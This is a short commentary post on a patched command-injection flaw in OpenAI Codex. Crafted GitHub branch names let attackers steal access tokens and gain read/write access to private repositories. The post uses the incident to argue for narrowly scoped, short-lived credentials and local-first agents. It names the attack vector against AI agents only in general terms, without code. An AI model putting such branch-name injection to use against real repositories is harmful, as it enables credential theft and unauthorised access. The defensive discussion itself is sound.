OpenAI Codex mishandled GitHub branch names in a way that allowed command injection — crafted branch names could steal access tokens and give read/write over private repositories. Patched.
Zoom out. The pattern is more important than this specific CVE.
Autonomous AI agents are being given real credentials to real systems: source code, cloud consoles, deployment pipelines, databases. Each of those credentials is a blast radius. When the agent is compromised — through prompt injection, input smuggling, or a runtime flaw like this one — the attacker inherits whatever the agent was trusted with.
The defense is not "harder prompt guards." It's scoping. An agent should have the narrowest possible authority, the shortest possible credential lifetime, and the tightest possible locality. Ideally it should not reach across the network at all.
Local-first AI is the cleanest version of that principle. The agent runs inside the boundary it is allowed to act on, with no ambient network authority to be stolen. That is not paranoia — that is the architecture the incident log is steadily arguing for.